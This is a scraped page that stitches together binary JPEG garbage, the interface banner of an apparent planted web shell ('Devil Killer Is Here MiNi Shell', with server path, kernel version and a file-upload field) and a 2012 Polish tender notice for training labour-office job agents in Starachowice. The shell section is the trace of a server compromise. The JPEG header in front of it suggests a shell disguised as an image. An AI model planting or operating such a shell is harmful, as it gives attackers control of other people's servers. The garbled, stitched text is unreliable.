JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120327/69925-N-2012.html

<p class="kh_header"><b>Starachowice: Zorganizowanie i przeprowadzenie szkolenia pn. Nowości w pracy pośrednika w 2012 roku dla 6 pośredników pracy zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach dwóch projektów: Profesjonalny pośrednik - dostępny Urząd, Profesjonalizm naszą dewizą - uśmiech naszą wizytówką współfinansowanych ze środków Europejskiego Funduszu Społecznego, realizowanego 
z Programu Operacyjnego Kapitał Ludzki - Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2.</b><br>
<b>Numer ogłoszenia: 69925 - 2012; data zamieszczenia: 27.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Starachowicach , ul. Radomska 76, 27-200 Starachowice, woj. świętokrzyskie, tel. 41 273 62 00, faks 41 273 62 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia pn. Nowości w pracy pośrednika w 2012 roku dla 6 pośredników pracy zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach dwóch projektów: Profesjonalny pośrednik - dostępny Urząd, Profesjonalizm naszą dewizą - uśmiech naszą wizytówką współfinansowanych ze środków Europejskiego Funduszu Społecznego, realizowanego 
z Programu Operacyjnego Kapitał Ludzki - Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie szkolenia pn. Nowości w pracy pośrednika w 2012 roku dla 6  pośredników pracy zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach dwóch projektów: Profesjonalny pośrednik - dostępny Urząd, Profesjonalizm naszą dewizą - uśmiech naszą wizytówką współfinansowanych ze środków Europejskiego Funduszu Społecznego, realizowanego 
z Programu Operacyjnego Kapitał Ludzki - Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie. Znak sprawy: ZP/4/2012. 
Kod zgodnie ze słownikiem CPV 80510000-2  

1.	Celem szkolenia jest poznanie zmian z zakresu prowadzenia pośrednictwa pracy w świetle nowych standardów oraz nabycie praktycznych umiejętności z zakresu stosowania przepisów zmieniających rozporządzenie w sprawie standardów i warunków prowadzenia usług rynku pracy.
2.	Program szkolenia musi zawierać następujące bloki tematyczne:
       - zmiany w prowadzeniu pośrednictwa pracy w świetle nowych standardów.
       - nowa dokumentacja, wzory krajowe i unijne, rynek pracy otwarty dla wszystkich - realizacja   
  priorytetu z wykorzystaniem ustawy o promocji (  ) i obowiązujących standardów.
       - prowadzenie postępowań wyjaśniających w pośrednictwie pracy.
       - odmowa, nie zgłoszenie się w wyznaczonym terminie, przerwanie, rezygnacja - studium
         przypadku     
3.	Szkolenie ma zostać zorganizowane i przeprowadzone do dnia 31.05.2012 r. 
4.	Proponowana liczba godzin około 20 według przedłożonego szczegółowego programu szkolenia.
5.	Czas trwania szkolenia 3 dni.
6.	Zamówienie ma być zrealizowane zgodnie z programem szkolenia. Wymaga się, aby zajęcia odbywały się codziennie w dni powszednie.
7.	Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz w dni ustawowo wolne od pracy.
8.	Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych. 
9.	Wykłady muszą się odbywać w sali wykładowej przystosowanej do tego typu celów.
10.	Wykonawca zapewni niezbędny sprzęt oraz pomoce dydaktyczne dla prawidłowego przeprowadzenia szkolenia.
11.	Wykonawca zapewni w trakcie trwania szkolenia i w miejscu zakwaterowania oraz w przypadku  
 zorganizowania transportu dla uczestników szkolenia warunki zgodne z przepisami  
 bezpieczeństwa i higieny pracy. 
12.	Wykonawca zapewni odpowiednią kadrę szkoleniową, oraz opracuje szczegółowy harmonogram szkolenia.
13.	Wykonawca zobowiązany jest do upowszechniania informacji poprzez oznaczenie sal wykładowych, materiałów dydaktycznych oraz wszelkiej dokumentacji związanej z organizacją szkolenia, że projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.    
14.	Każdy uczestnik szkolenia, w dniu rozpoczęcia zajęć otrzyma materiały szkoleniowe w formie skryptów, materiałów biurowych (przybory piśmienne, notatnik, itp.), pomoce dydaktyczne niezbędne do realizacji szkolenia oraz szczegółowy harmonogram szkolenia 
15.	Po zakończeniu szkolenia Wykonawca zamówienia wyda odpowiednie zaświadczenie zgodne 
z wzorem zatwierdzonym przez MEN.
16.	Miejsce szkolenia oraz zakwaterowania uczestników szkolenia nie może być usytuowane 
bliżej niż 60 km i nie dalej niż 300 km od granicy miasta Starachowice.
17.	Wykonawca zapewni przewóz dla sześciu uczestników szkolenia z siedziby Zamawiającego 
tj. Starachowice ul. Radomska 76 do miejsca szkolenia i z powrotem lub pokryje koszty związane z dojazdem 6 uczestników szkolenia ze Starachowic do miejsca szkolenia i z powrotem.   
18.	Wykonawca zapewni ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników szkolenia od pierwszego do ostatniego dnia szkolenia a w przypadku organizowania przez Wykonawcę przewozu dodatkowo na okres podróży. 
19.	Wykonawca zapewni dwa noclegi dla sześciu pośredników skierowanych na szkolenie. 
20.	Uczestnicy szkolenia zostaną zakwaterowani w hotelu co najmniej dwu gwiazdkowym lub pensjonacie o równorzędnym standardzie w pokojach 2 lub 1 osobowych wyposażonych w pełny węzeł sanitarny.
21.	Wykonawca zapewni podczas trwania szkolenia całodzienne wyżywienie dla uczestników  szkolenia (2 śniadania, 3 obiady, 2 kolacje) oraz serwis kawowy podczas trwania zajęć. Posiłki mają być podawane w innej sali niż wykładowa przystosowanej do tego celu.  
22.	W przypadku braku możliwości dojazdu uczestników na miejsce szkolenia w dniu rozpoczęcia szkolenia Wykonawca zapewni dodatkowy nocleg zgodny z w/w opisem, dodatkową kolację
w przeddzień szkolenia oraz śniadanie w dniu szkolenia. 
23.	Zajęcia dydaktyczne muszą odbywać się w miejscu zakwaterowania uczestników szkolenia lub 
w odległości nie większej niż 1 km od miejsca zakwaterowania. W przypadku gdy zajęcia odbywać się będą w odległości większej niż 1 km od miejsca zakwaterowania uczestników Wykonawca zapewni transport na i z miejsca odbywania zajęć.  
24.	Ostatni dzień szkolenia musi zakończyć się w godzinach umożliwiających powrót uczestników szkolenia do miejsca zamieszkania w dniu zakończenia szkolenia.
25.  Zamawiający przewiduje:   
      - ze strony Wykonawcy - możliwość zmiany, opiekuna grupy, kadry dydaktycznej mającej 
         prowadzić to szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana dotyczy osoby, 
         której kwalifikacje były punktowane przy wyborze najkorzystniejszej oferty, konieczne jest by 
         zaproponowana osoba posiadała tożsame kwalifikacje z osobą której zamiana dotyczy a jej  
         kwalifikacje muszą zostać potwierdzone poprzez złożenie kserokopii stosownych dokumentów. 
         Powyższe zmiany nie będą powodować aneksowania umowy, a jedynie wymagają akceptacji  
         przez Zamawiającego po wcześniejszym pisemnym jego powiadomieniu. Zamawiający  
         dopuszcza zmiany miejsca odbywania szkolenia pod warunkiem, że nowe miejsce szkolenia 
         wskazane przez Wykonawcę będzie usytuowane w tej samej miejscowości, którą wskazał 
         Wykonawca w złożonej ofercie. Zmiana ta wymaga aneksowania umowy. Zamawiający 
         przewiduje zmianę sprzętu technicznego wykorzystywanego podczas przeprowadzania szkolenia 
         określonego w załącznikach oraz ofercie jednostki szkolącej pod warunkiem, że wymieniony 
         sprzęt znajdzie zastosowanie  podczas przeprowadzania tego szkolenia. Zmiana ta wymaga 
         jedynie akceptacji Zamawiającego.
         - ze strony Zamawiającego terminu wykonania zamówienia (wcześniejsze, późniejsze  
        wykonanie przedmiotu zamówienia), liczby uczestników szkolenia przed jego rozpoczęciem.
        W przypadku zmiany  liczby uczestników szkolenia Zamawiający dokona zapłaty za liczbę osób   
        faktycznie przeszkolonych (iloczyn faktycznej liczby osób przeszkolonych i ceny jednostkowej).
        Przez cenę jednostkową należy rozumieć iloraz ceny brutto oferty i liczby uczestników szkolenia 
        określonej w opisie przedmiotu zamówienia.
26.  Zamawiający przewiduje możliwość zmiany osób upoważnionych do współpracy wymienionych  
        w umowie. 
27. W przypadku zmiany wysokości podatku VAT od towarów i usług cena brutto przedmiotu 
       zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku.

Przed podpisaniem umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu:
     a) ramowy program szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania   
          projektów w ramach Programu Operacyjnego Kapitał Ludzki zawierający następujące bloki 
          tematyczne:
          - zmiany w prowadzeniu pośrednictwa pracy w świetle nowych standardów.
          - nowa dokumentacja, wzory krajowe i unijne, rynek pracy otwarty dla wszystkich - realizacja   
     priorytetu z wykorzystaniem ustawy o promocji (   ) i obowiązujących standardów.
         -  prowadzenie postępowań wyjaśniających w pośrednictwie pracy.
         -  odmowa, nie zgłoszenie się w wyznaczonym terminie, przerwanie, rezygnacja - studium
            przypadku.
    b)  harmonogram szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania projektów   
   w ramach Programu Operacyjnego Kapitał Ludzki. 
    c)  wzór ankiety dla uczestników szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi  
           oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
    d)    wzór zaświadczenia o ukończeniu szkolenia zgodny ze wzorem zatwierdzonym przez MEN.
    e)  aktualny odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
           działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do 
           ewidencji działalności gospodarczej. Dokument może być złożony w formie oryginału lub 
           kopii poświadczonej za zgodność z oryginałem.
Nie dostarczenie tych dokumentów będzie skutkowało odstąpieniem przez Zamawiającego od podpisania umowy.
W przypadku osób działających jako pełnomocnicy, do oferty należy dołączyć pełnomocnictwo
w formie oryginału lub w formie poświadczonej notarialnie kopii.
Przed rozliczeniem finansowym przedmiotu zamówienia Zamawiający w formie protokołu dokona odbioru zadania zleconego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku - uprawnienia 
- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych 
  - załącznik nr 1 do SIWZ, 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku - wiedza i doświadczenie 
- Warunkiem uczestnictwa w postępowaniu jest przeprowadzenie z należytą starannością w okresie   
   ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
   krótszy - w tym okresie przynajmniej jednego szkolenia o tej samej lub podobnej tematyce co 
   przedmiot zamówienia.
- Na podstawie złożonego dokumentu potwierdzającego przeprowadzenie z należytą starannością 
   przynajmniej jednego szkolenia o tej samej lub podobnej tematyce co przedmiot zamówienia. Dokumentem potwierdzającym przeprowadzenie szkolenia może być dokument, który jednoznacznie potwierdzi należyte wykonanie usługi np. list referencyjny, protokół odbioru usługi szkoleniowej itp. wydany przez jednostkę, dla której Wykonawca ubiegający się o udzielenie  zamówienia przeprowadził szkolenie o tej samej lub podobnej tematyce co przedmiot zamówienia. Dokument ten musi zawierać termin jego przeprowadzenia oraz określać ilość osób uczestniczących w tym szkoleniu. 
- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych
   - załącznik nr 1 do SIWZ,
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku - potencjał techniczny 
- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych 
   - załącznik nr 1 do SIWZ,    
- Na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem technicznym   
   zapewniającym wykonanie przedmiotu zamówienia - załącznik nr 2 do SIWZ. W przypadku gdy 
   jednostka szkoląca nie posiada własnej bazy szkoleniowej w miejscu odbywania się szkolenia na 
   spełnienie tego warunku należy dołączyć dodatkowo np.: zobowiązanie do współpracy, umowę 
   przedwstępną użyczenia, dzierżawy, najmu bazy szkoleniowej, w której winny zostać określone: 
   warunki lokalowe, wyposażenie sal do przeprowadzenia zajęć, pomoce dydaktyczne, sprzęt 
   techniczny. W przypadku braku tych zapisów w w/w dokumentach, informacje te proszę zawrzeć 
   w załączniku nr 2 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku - osoby zdolne do wykonywania zamówienia 
-  Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych
    - załącznik nr 1 do SIWZ,    
- Na podstawie złożonego oświadczenia o dysponowaniu osobami zdolnymi do wykonania 
    przedmiotu zamówienia - załącznik nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku - sytuacja ekonomiczna i finansowa 
-  Na podstawie złożonego oświadczenia o sytuacji finansowej gwarantującej  realizację przedmiotu 
    zamówienia, złożonego oświadczenia o niezaleganiu z opłacaniem podatków oraz o niezaleganiu 
    z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, ewentualnie oświadczenie 
    o uzyskaniu przewidzianym prawem zwolnieniu, odroczeniu lub rozłożeniu na raty zaległych  
    płatności - załącznik nr 4 do SIWZ, 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Kwalifikacje kadry dydaktycznej mającej prowadzić to szkolenie - 10</li>
<li>3 - Kryterium jakości świadczonych usług przez Wykonawcę - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie zawarta umowa, której projekt 
     stanowi załącznik Nr 7 do niniejszej specyfikacji.
2. W przypadku zmiany wysokości podatku VAT  od towarów i usług cena brutto przedmiotu  
     zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku
3. Na podstawie art. 145 ustawy prawo zamówień publicznych w razie zaistnienia istotnej zmiany 
     okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można  
     było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 
     30 dni od powzięcia wiadomości o tych okolicznościach.
     W tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należytego z tytułu 
     wykonania części umowy.
4.  Zamawiający przewiduje:   
     - ze strony Wykonawcy - możliwość zmiany, opiekuna grupy, kadry dydaktycznej mającej  
     prowadzić to szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana dotyczy osoby, 
     której kwalifikacje były punktowane przy wyborze najkorzystniejszej oferty, konieczne jest by 
     zaproponowana osoba posiadała tożsame kwalifikacje z osobą której zamiana dotyczy a jej 
     kwalifikacje muszą zostać potwierdzone poprzez złożenie kserokopii stosownych dokumentów.  
     Powyższe zmiany nie będą powodować aneksowania umowy, a jedynie wymagają akceptacji przez 
     Zamawiającego po wcześniejszym pisemnym jego powiadomieniu. Zamawiający dopuszcza 
     zmiany miejsca odbywania szkolenia pod warunkiem, że nowe miejsce szkolenia wskazane przez   
     Wykonawcę będzie usytuowane w tej samej miejscowości, którą wskazał Wykonawca w złożonej  
     ofercie. Zmiana ta wymaga aneksowania umowy. Zamawiający przewiduje zmianę sprzętu 
     technicznego wykorzystywanego podczas przeprowadzania szkolenia określonego w załącznikach 
     oraz ofercie jednostki szkolącej pod warunkiem, że wymieniony sprzęt znajdzie zastosowanie  
     podczas przeprowadzania tego szkolenia. Zmiana ta wymaga jedynie akceptacji Zamawiającego.
     - ze strony Zamawiającego - terminu wykonania zamówienia (wcześniejsze, późniejsze 
     wykonanie przedmiotu zamówienia), liczby uczestników szkolenia przed jego rozpoczęciem. 
     W przypadku zmiany  liczby uczestników szkolenia Zamawiający dokona zapłaty za liczbę osób 
     faktycznie przeszkolonych (iloczyn faktycznej liczby osób przeszkolonych i ceny jednostkowej).
     Przez cenę jednostkową należy rozumieć iloraz ceny brutto oferty i liczby uczestników szkolenia 
     określonej w opisie przedmiotu zamówienia.
     Zamawiający przewiduje możliwość zmiany osób upoważnionych do współpracy wymienionych 
     w umowie. 
Przed podpisaniem umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu:
     a) ramowy program szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania   
          projektów w ramach Programu Operacyjnego Kapitał Ludzki zawierający następujące bloki 
          tematyczne:
          - zmiany w prowadzeniu pośrednictwa pracy w świetle nowych standardów.
          - nowa dokumentacja, wzory krajowe i unijne, rynek pracy otwarty dla wszystkich - realizacja   
     priorytetu z wykorzystaniem ustawy o promocji (    ) i obowiązujących standardów.
         -  prowadzenie postępowań wyjaśniających w pośrednictwie pracy.
         -  odmowa, nie zgłoszenie się w wyznaczonym terminie, przerwanie, rezygnacja - studium
            przypadku.
    b)  harmonogram szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania projektów   
   w ramach Programu Operacyjnego Kapitał Ludzki. 
    c)  wzór ankiety dla uczestników szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi  
           oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
    d)    wzór zaświadczenia o ukończeniu szkolenia zgodny ze wzorem zatwierdzonym przez MEN.
    e)  aktualny odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
           działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do 
           ewidencji działalności gospodarczej. Dokument może być złożony w formie oryginału lub 
           kopii poświadczonej za zgodność z oryginałem.
Nie dostarczenie tych dokumentów będzie skutkowało odstąpieniem przez Zamawiającego od podpisania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pup-starachowice.pl  
Zakładka zamówienia publiczne..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2012 godzina 12:00, miejsce: Siedziba Zamawiającego: Powiatowy Urząd Pracy w Starachowicach ul. Radomska 76, w pokoju 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




